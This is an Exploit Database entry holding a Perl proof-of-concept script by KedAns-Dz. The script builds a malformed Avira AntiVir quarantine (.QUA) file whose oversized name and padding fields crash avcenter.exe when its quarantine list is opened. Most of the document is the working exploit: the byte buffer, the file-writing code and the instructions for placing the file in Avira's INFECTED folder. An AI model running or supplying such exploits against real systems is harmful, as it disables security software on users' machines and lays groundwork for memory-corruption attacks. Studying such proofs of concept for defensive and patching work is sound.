Avira AntiVir – ‘.QUA’ File ‘avcenter.exe’ Local Crash (PoC)

• Exploit Database
• 10 阅读

• 作者： KedAns-Dz
  日期： 2011-02-19
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/16193/

• #!/usr/bin/perl
  #================================================================================= |
  #| # Title: Avira AntVir QUA file in ( avcenter.exe) Local Crash PoC|
  #| # Author : KedAns-Dz |
  #| # email: Ked-h@hotmail.com|
  #| # Home : HMD/AM (30500/04300) - Algeria -(00213555248701) |
  #| # Web Site : /(~_-)\ ...|
  #| # Tested on : windows XP SP3 Français & Arabic |
  #| # Target SFW : Avira Anti Virus Version 10.00.12.28 | 
  #| # Info : Copy the QUA file in : |
  #..\..\All Users\Application Data\Avira\AntiVir Desktop\INFECTED |
  #> You are Opening The avcenter.exe and show Quarantine list |
  #the avcenter is Task kill and Show Crash Error |
  #======================Exploit By KedAns-Dz =================================|
  # Perl File: 
  #----------------------------------
  #START SYSTEM /root@MSdos/ : 
  system("title KedAns-Dz");
  system("color 1e");
  system("cls");
  print "\n\n".
  "||========================================||\n".
  	"||||\n".
  	"|| Avira AntVir Local Crash PoC ||\n".
  	"||Exploit Buffer Overflow ||\n".
  	"||Created BY KedAns-Dz||\n".
  	"|| ked-h(at)hotmail(dot)com ||\n".
  	"||||\n".
  	"||========================================||\n\n\n";
  sleep(2);
  print "\n";
  my $Buf = 
  "\x41\x6e\x74\x69\x56\x69\x72\x20\x51\x75\x61\x00\x00\x00\x00\x00".
  "\x46\x01\x00\x00\x6a\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00".
  "\x00\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00\x01\x00\x00\x00".
  "\x00\x00\x00\x00\x28\x00\x00\x02\x00\x00\x0e\x04\x69\x4c\x00\x00".
  "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x02\x00".
  "\x00\x07\x00\x00\x00\x42".
  "\x00" x 51 .
  "\x4b\x65\x64\x40\x41\x6e\x73\x2f\x41\x76\x32\x42\x6f\x46\x2e\x50\x6c\x7c". # Infected Name
  "\x31" x 378 . # Bad Multi Number
  "\x00" x 48 .
  "\x5c\x00\x5c\x00\x3f\x00\x5c\x00\x43\x00\x3a\x00\x5c\x00\x4b\x00\x2e\x00\x44\x00\x7a" . # Path V-Qua
  "\x41" x 380 ; # Junk
  $file = "4fkedans.qua";
  open (F ,">$file");
  print F $Buf;
  sleep (2);
  print "\n Creat File : $file , Succesfully ! \n";
  close (F);
  #================[ Exploited By KedAns-Dz * HST-Dz * ]=========================|
  #[»] Team :[D] HaCkerS-StreeT-Team [Z] > Algerians Hackers < |
  # Greetz : Islampard * Zaki.Eng * Noro FouinY * BadR0 * Dr.Ride * Massinhou-Dz |
  # Red1One * Fox-Dz * Hani * XoreR * Mr.Dak007 * TOnyXED * all my friends ..| 
  #------------------------------------------------------------------------------|